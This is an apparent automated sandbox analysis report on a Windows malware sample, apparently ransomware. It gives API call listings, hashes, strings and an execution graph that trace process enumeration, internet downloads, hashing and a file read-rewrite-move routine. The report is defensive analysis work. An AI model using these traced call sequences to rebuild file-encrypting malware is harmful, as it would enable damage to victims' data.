                                                                                                        • Instruction ID: 88649ff8781f4c58ce3ea22232c4fec9fd691870b9759665ce7d6bdb87310217
                                                                                                        • Opcode Fuzzy Hash: f1d85e974ab29a4cbc04f756fa82de7abe19e124d1eccbc662293cda5614e03a
                                                                                                        • Instruction Fuzzy Hash: 43014972A8022C33DE30B6A4AC47FFFB35C8B51731F000197FE08D6180E6A58986B6D1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00F2BA4A
                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00F2BA73
                                                                                                        Strings
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                        • String ID: 0$LPCWSTRszWindowClass
                                                                                                        • API String ID: 1693014935-1496217519
                                                                                                        • Opcode ID: 02904a343081b95e8ffcc9e41433c46ceb8cde470cc4e6a041191ad17667ec98
                                                                                                        • Instruction ID: 6c60ca5677076bf3815c526cc9e2e498db1c9879f4d7b8363cbe2b704573a627
                                                                                                        • Opcode Fuzzy Hash: 02904a343081b95e8ffcc9e41433c46ceb8cde470cc4e6a041191ad17667ec98
                                                                                                        • Instruction Fuzzy Hash: 8FF062B0C0531D9BEB00DFD5D9597DEBBB4BB08709F104259D9147A280D7BA1608CFD5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F1C438
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F1C44E
                                                                                                        • DeleteFileA.KERNEL32(?), ref: 00F1C45B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendDeleteFileFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 610490371-2616962270
                                                                                                        • Opcode ID: 03014b01f0396e33a75fa495966a2c21aaf4fa8026e69ceab6797072e2e3cb7e
                                                                                                        • Instruction ID: 0922b072f7bd7781445a5081a131b6321a65a6d68e2f3b61e790d0e3b3de6491
                                                                                                        • Opcode Fuzzy Hash: 03014b01f0396e33a75fa495966a2c21aaf4fa8026e69ceab6797072e2e3cb7e
                                                                                                        • Instruction Fuzzy Hash: A0E0867568431E67EB20EBB0DC8AFD9776C9B04B01F000093BB48D60C0D6B0A584DAD1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove_strtok
                                                                                                        • String ID:
                                                                                                        • API String ID: 3446180046-0
                                                                                                        • Opcode ID: b9f72f1d52a587435e49d668fb60e2057325d9f5f6c983d7b4a9acb1398822be
                                                                                                        • Instruction ID: b0f79aa3d1308da9fc350e7dc9b8b72b98a34c2bc32db489243af673e7059d1f
                                                                                                        • Opcode Fuzzy Hash: b9f72f1d52a587435e49d668fb60e2057325d9f5f6c983d7b4a9acb1398822be
                                                                                                        • Instruction Fuzzy Hash: 9881ACB1A00206DFEB14DF58D9807EEBBF1FF14314F14492DE80697281D7BAAA94DB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F4C6AD
                                                                                                        • __isleadbyte_l.LIBCMT ref: 00F4C6DB
                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,00F4C0ED,?,00BFBBEF,00000003), ref: 00F4C709
                                                                                                        • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,00F4C0ED,?,00BFBBEF,00000003), ref: 00F4C73F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                        • String ID:
                                                                                                        • API String ID: 3058430110-0
                                                                                                        • Opcode ID: 67e2f5b9c0987b4ac24b7ca93c3dabecba67b478c8b249c8e2697c4cba9415a5
                                                                                                        • Instruction ID: 6fb8c094938371a36a6c0509715a6cbe44a7c27f6c515fcd31aa33f2423a73c3
                                                                                                        • Opcode Fuzzy Hash: 67e2f5b9c0987b4ac24b7ca93c3dabecba67b478c8b249c8e2697c4cba9415a5
                                                                                                        • Instruction Fuzzy Hash: 9731CF31A02206EFDB618F75CC44BAA7FA9FF41320F15A429E854871A0E731E850EBD0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • ___BuildCatchObject.LIBCMT ref: 00FD70AB
                                                                                                          • Part of subcall function 00FD77A0: ___BuildCatchObjectHelper.LIBCMT ref: 00FD77D2
                                                                                                          • Part of subcall function 00FD77A0: ___AdjustPointer.LIBCMT ref: 00FD77E9
                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 00FD70C2
                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 00FD70D4
                                                                                                        • CallCatchBlock.LIBCMT ref: 00FD70F8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                        • String ID:
                                                                                                        • API String ID: 2901542994-0
                                                                                                        • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                        • Instruction ID: 361b905be228522e809e84bd1e76a55e94c990872c0401f098e44e9a85337dc3
                                                                                                        • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                        • Instruction Fuzzy Hash: 87012932400208BBCF126F55CC05EDA3BBBFF88714F184016FD1866221E336E961EBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                          • Part of subcall function 00F35007: __getptd_noexit.LIBCMT ref: 00F35008
                                                                                                          • Part of subcall function 00F35007: __amsg_exit.LIBCMT ref: 00F35015
                                                                                                        • __calloc_crt.LIBCMT ref: 00F35A01
                                                                                                          • Part of subcall function 00F38C96: __calloc_impl.LIBCMT ref: 00F38CA5
                                                                                                        • __lock.LIBCMT ref: 00F35A37
                                                                                                        • ___addlocaleref.LIBCMT ref: 00F35A43
                                                                                                        • __lock.LIBCMT ref: 00F35A57
                                                                                                          • Part of subcall function 00F35208: __getptd_noexit.LIBCMT ref: 00F35208
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                        • String ID:
                                                                                                        • API String ID: 2580527540-0
                                                                                                        • Opcode ID: da160c8f9bcf42c87b99b11bda93050bf1f598e0632c307344c94525d48449a1
                                                                                                        • Instruction ID: 8662862152116c1f7f151848b22322afb224ff91b49657e01cd8ee4b7d1ed806
                                                                                                        • Opcode Fuzzy Hash: da160c8f9bcf42c87b99b11bda93050bf1f598e0632c307344c94525d48449a1
                                                                                                        • Instruction Fuzzy Hash: 10015272941740DFDB20FFA88C42B1D7BE09F81B70F204249F4659B2C6CE7C5941BA65
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                        • String ID:
                                                                                                        • API String ID: 3016257755-0
                                                                                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                        • Instruction ID: 17738081dfb00625a74465165169b7e4db817906d36e5fe9c4220b9237076c56
                                                                                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                        • Instruction Fuzzy Hash: 1601403640014EBFCF125E84CC528EE3F66BB29356F588455FF1958135CA3AC9B6BB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32 ref: 00F227B9
                                                                                                        • _malloc.LIBCMT ref: 00F227C3
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: RtlAllocateHeap.NTDLL(00840000,00000000,00000001,00000001,?,?,?,00F40E81,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30CA5
                                                                                                        • _memset.LIBCMT ref: 00F227CE
                                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 00F227E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.2324419483.0000000000F10000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324543370.0000000000FDC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324599475.000000000101A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324635602.000000000101C000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001020000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.000000000102A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324677412.0000000001039000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000002.00000002.2324793999.000000000103B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2824100046-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32 ref: 00F22806
                                                                                                        • _malloc.LIBCMT ref: 00F22814
                                                                                                          • Part of subcall function 00F30C62: __FF_MSGBANNER.LIBCMT ref: 00F30C79
                                                                                                          • Part of subcall function 00F30C62: __NMSG_WRITE.LIBCMT ref: 00F30C80
                                                                                                          • Part of subcall function 00F30C62: RtlAllocateHeap.NTDLL(00840000,00000000,00000001,00000001,?,?,?,00F40E81,00000001,00000000,?,?,?,00F40D1A,00F5F284,?), ref: 00F30CA5
                                                                                                        • _memset.LIBCMT ref: 00F2281F
                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000), ref: 00F22832
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2824100046-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: .\crypto\asn1\tasn_new.c
                                                                                                        • API String ID: 2102423945-2878120539
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset
                                                                                                        • String ID: .\crypto\buffer\buffer.c
                                                                                                        • API String ID: 2102423945-294840303
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00F23CA0
                                                                                                          • Part of subcall function 00F33B4C: _malloc.LIBCMT ref: 00F33B64
                                                                                                        • _memset.LIBCMT ref: 00F23C83
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_f10000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception_malloc_memset
                                                                                                        • String ID: vector<T> too long
                                                                                                        • API String ID: 1327501947-3788999226
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • Assertion failed: %s, file %s, line %d, xrefs: 00F30E13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __calloc_crt
                                                                                                        • String ID: Assertion failed: %s, file %s, line %d
                                                                                                        • API String ID: 3494438863-969893948
                                                                                                        • Opcode ID: 8fc908a76ccd774e0978c92420c21e76c8de1dc81fb34517ad123e310377705f
                                                                                                        • Instruction ID: 788743a592a0546ae71b4a40a1045eb91d6fa60b5a0de4bf7b1bb56b7f569e9a
                                                                                                        • Opcode Fuzzy Hash: 8fc908a76ccd774e0978c92420c21e76c8de1dc81fb34517ad123e310377705f
                                                                                                        • Instruction Fuzzy Hash: FCF0A471709211DBE734DA6ABC21BA137D8B715770F10441BF280CB188EF7D88816794
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • _memset.LIBCMT ref: 00F90686
                                                                                                          • Part of subcall function 00F64C00: _raise.LIBCMT ref: 00F64C18
                                                                                                        Strings
                                                                                                        • ctx->digest->md_size <= EVP_MAX_MD_SIZE, xrefs: 00F9062E
                                                                                                        • .\crypto\evp\digest.c, xrefs: 00F90638
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.2324458170.0000000000F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memset_raise
                                                                                                        • String ID: .\crypto\evp\digest.c$ctx->digest->md_size <= EVP_MAX_MD_SIZE
                                                                                                        • API String ID: 1484197835-3867593797
                                                                                                        • Opcode ID: b4853a2ad07067acaf4bca0184de09dcf27ae418265e5a28e2b7c5123b3be235
                                                                                                        • Instruction ID: 6e3f65c682a5d630d58f9931d5508eeecda024f9ad8d83db3ca882233a9ebdce
                                                                                                        • Opcode Fuzzy Hash: b4853a2ad07067acaf4bca0184de09dcf27ae418265e5a28e2b7c5123b3be235
                                                                                                        • Instruction Fuzzy Hash: CB018F75A002009FD711DF08EC42E55B7E1AFC8710F154428F584CB352DB62EC559B95
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:7%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:2000
                                                                                                        Total number of Limit Nodes:199
39487->39151 39488->39158 39489->39165 39491 f3aeb8 EncodePointer 39490->39491 39491->39491 39492 f3aed2 39491->39492 39492->39169 39493->39171 39495 f0cf32 _memset __ftell_nolock 39494->39495 39496 f0cf4f InternetOpenW 39495->39496 39497 f15c10 59 API calls 39496->39497 39498 f0cf8a InternetOpenUrlW 39497->39498 39499 f0cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 39498->39499 39507 f0cfb2 39498->39507 39800 f156d0 39499->39800 39501 f0d000 39502 f156d0 59 API calls 39501->39502 39503 f0d049 39502->39503 39503->39507 39819 f13010 59 API calls 39503->39819 39505 f0d084 39505->39507 39820 f13010 59 API calls 39505->39820 39507->39175 39509 f13ab2 39508->39509 39516 f13ad0 GetModuleFileNameW PathRemoveFileSpecW 39508->39516 39510 f13b00 39509->39510 39511 f13aba 39509->39511 39822 f4f23e 59 API calls 2 library calls 39510->39822 39512 f23b4c 59 API calls 39511->39512 39514 f13ac7 39512->39514 39514->39516 39823 f4f1bb 59 API calls 3 library calls 39514->39823 39518 f18400 39516->39518 39519 f18437 39518->39519 39523 f18446 39518->39523 39519->39523 39824 f15d50 59 API calls _signal 39519->39824 39520 f184b9 39520->39198 39523->39520 39825 f18d50 59 API calls 39523->39825 39826 f31781 39524->39826 39528 f2f7c0 __ftell_nolock 39527->39528 39529 f1222d 7 API calls 39528->39529 39530 f122bd K32EnumProcesses 39529->39530 39531 f1228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 39529->39531 39532 f122d3 39530->39532 39533 f122df 39530->39533 39531->39530 39532->39203 39534 f12353 39533->39534 39535 f122f0 OpenProcess 39533->39535 39534->39203 39536 f12346 CloseHandle 39535->39536 39537 f1230a K32EnumProcessModules 39535->39537 39536->39534 39536->39535 39537->39536 39538 f1231c K32GetModuleBaseNameW 39537->39538 39842 f20235 39538->39842 39540 f1233e 39540->39536 39541 f12345 39540->39541 39541->39536 39543 f20c62 _malloc 58 API calls 39542->39543 39546 f0ef6e _memset 39543->39546 39544 f0efdc 39544->39208 39545 f20c62 _malloc 58 API calls 
39545->39546 39546->39544 39546->39545 39548 f13f05 39547->39548 39552 f13eae 39547->39552 39549 f13fb1 39548->39549 39550 f13f18 39548->39550 39856 f4f23e 59 API calls 2 library calls 39549->39856 39553 f13fbb 39550->39553 39554 f13f2d 39550->39554 39556 f13f3d _signal 39550->39556 39552->39548 39560 f13ed4 39552->39560 39857 f4f23e 59 API calls 2 library calls 39553->39857 39554->39556 39558 f16760 59 API calls 39554->39558 39556->39208 39558->39556 39562 f13ed9 39560->39562 39563 f13eef 39560->39563 39854 f13da0 59 API calls _signal 39562->39854 39855 f13da0 59 API calls _signal 39563->39855 39566 f13eff 39566->39208 39567 f13ee9 39567->39208 39858 f0e670 39568->39858 39570 f0e79e 39571 f13ea0 59 API calls 39570->39571 39572 f0e7c3 39571->39572 39573 f13ff0 59 API calls 39572->39573 39574 f0e7ff 39573->39574 39884 f0e870 39574->39884 39576 f0e806 39577 f13ff0 59 API calls 39576->39577 39578 f0e80d 39576->39578 39577->39578 39578->39269 40154 f13c40 39579->40154 39581 f1288c WideCharToMultiByte 40164 f184e0 39581->40164 39583 f128cf 39583->39276 39585 f1102b CryptCreateHash 39584->39585 39586 f1101a 39584->39586 39587 f11045 39585->39587 39588 f11056 lstrlenA CryptHashData 39585->39588 40182 f30eca RaiseException 39586->40182 40183 f30eca RaiseException 39587->40183 39591 f1107f CryptGetHashParam 39588->39591 39592 f1106e 39588->39592 39594 f1109f 39591->39594 39596 f110b0 _memset 39591->39596 40184 f30eca RaiseException 39592->40184 40185 f30eca RaiseException 39594->40185 39597 f110cf CryptGetHashParam 39596->39597 39598 f110f5 39597->39598 39599 f110e4 39597->39599 39600 f20c62 _malloc 58 API calls 39598->39600 40186 f30eca RaiseException 39599->40186 39603 f11105 _memset 39600->39603 39602 f11148 39605 f1114e CryptDestroyHash CryptReleaseContext 39602->39605 39603->39602 39604 f204a6 _sprintf 83 API calls 39603->39604 39606 f11133 lstrcatA 39604->39606 39605->39278 39606->39602 39606->39603 39608 f13a90 59 API calls 39607->39608 39609 f1294c 
MultiByteToWideChar 39608->39609 39610 f18400 59 API calls 39609->39610 39611 f1298d 39610->39611 39611->39297 39613 f13591 39612->39613 39614 f135d6 39612->39614 39613->39614 39615 f13597 39613->39615 39618 f135b7 39614->39618 40188 f14f70 59 API calls 39614->40188 39615->39618 40187 f14f70 59 API calls 39615->40187 39618->39316 39620 f12dec 39619->39620 39623 f12dfa 39619->39623 39621 f13ea0 59 API calls 39620->39621 39622 f12df5 39621->39622 39622->39372 39624 f13ea0 59 API calls 39623->39624 39625 f12e11 39624->39625 39625->39372 39627 f12c71 39626->39627 39628 f12c5f 39626->39628 39631 f156d0 59 API calls 39627->39631 39629 f156d0 59 API calls 39628->39629 39630 f12c6a 39629->39630 39630->39377 39632 f12c8a 39631->39632 39632->39377 39634 f13ff0 59 API calls 39633->39634 39635 f12c13 39634->39635 39636 f0ecb0 39635->39636 39637 f0ece5 39636->39637 39639 f0eefc 39637->39639 40189 f21b3b 59 API calls 3 library calls 39637->40189 39639->39402 39640 f156d0 59 API calls 39643 f0ed6b _memmove 39640->39643 39641 f15230 59 API calls 39641->39643 39643->39639 39643->39640 39643->39641 40190 f21b3b 59 API calls 3 library calls 39643->40190 39645 f13742 39644->39645 39646 f136e7 39644->39646 39651 f1370d 39645->39651 40192 f14f70 59 API calls 39645->40192 39646->39645 39647 f136ed 39646->39647 39647->39651 40191 f14f70 59 API calls 39647->40191 39648 f1377f 39653 f0ca70 39648->39653 39651->39648 39652 f14690 59 API calls 39651->39652 39652->39648 39657 f0cb64 39653->39657 39659 f0caa3 39653->39659 39654 f0cb6b 40193 f4f26c 59 API calls 3 library calls 39654->40193 39656 f0cb75 39656->39385 39657->39385 39658 f136c0 59 API calls 39658->39659 39659->39654 39659->39657 39659->39658 39661 f14690 59 API calls 39660->39661 39662 f130d4 39661->39662 39663 f0c740 39662->39663 40194 f20fdd 39663->40194 39666 f0c944 CreateDirectoryW 39668 f20fdd 115 API calls 39666->39668 39671 f0c960 39668->39671 39669 f0c90e 39669->39666 39675 f0c96a 39669->39675 39670 f0c906 40217 f23a38 
39670->40217 39671->39675 39683 f0c9d5 39671->39683 40230 f228fd 82 API calls 5 library calls 39671->40230 39675->39391 39676 f0c9ed 40232 f228fd 82 API calls 5 library calls 39676->40232 39677 f20546 58 API calls 39684 f0c79e _memmove 39677->39684 39680 f0c9f8 39682 f23a38 __fcloseall 83 API calls 39680->39682 39681 f15c10 59 API calls 39681->39684 39685 f0c9fe 39682->39685 40231 f228fd 82 API calls 5 library calls 39683->40231 39684->39670 39684->39677 39684->39681 39686 f14f70 59 API calls 39684->39686 40204 f21101 39684->40204 39685->39675 39686->39684 39688 f11223 GetFileSizeEx 39687->39688 39707 f11287 39687->39707 39689 f112a3 VirtualAlloc 39688->39689 39690 f11234 39688->39690 39692 f1131a CloseHandle 39689->39692 39696 f112c0 _memset 39689->39696 39690->39689 39691 f1123c CloseHandle 39690->39691 39693 f13100 59 API calls 39691->39693 39692->39394 39694 f11253 39693->39694 40650 f159d0 39694->40650 39699 f112e9 SetFilePointerEx 39696->39699 39731 f113a7 39696->39731 39697 f113b7 SetFilePointer 39702 f113f5 ReadFile 39697->39702 39770 f115ae 39697->39770 39698 f1126a MoveFileW 39698->39707 39700 f11332 ReadFile 39699->39700 39701 f1130c VirtualFree 39699->39701 39700->39701 39703 f1134f 39700->39703 39701->39692 39704 f11440 39702->39704 39705 f1140f VirtualFree CloseHandle 39702->39705 39703->39701 39708 f11356 39703->39708 39711 f11471 lstrlenA 39704->39711 39712 f11718 lstrlenA 39704->39712 39704->39770 39709 f1142f 39705->39709 39706 f115c5 SetFilePointerEx 39706->39705 39710 f115df 39706->39710 39707->39394 39708->39697 39715 f12c40 59 API calls 39708->39715 39709->39394 39713 f115ed WriteFile 39710->39713 39717 f11602 39710->39717 40676 f20be4 39711->40676 40728 f20be4 39712->40728 39713->39705 39713->39717 39720 f11364 39715->39720 39718 f130b0 59 API calls 39717->39718 39722 f11631 39718->39722 39720->39731 39732 f11379 VirtualFree CloseHandle 39720->39732 39725 f12840 60 API calls 39722->39725 39726 f1163c WriteFile 39725->39726 39734 f11658 
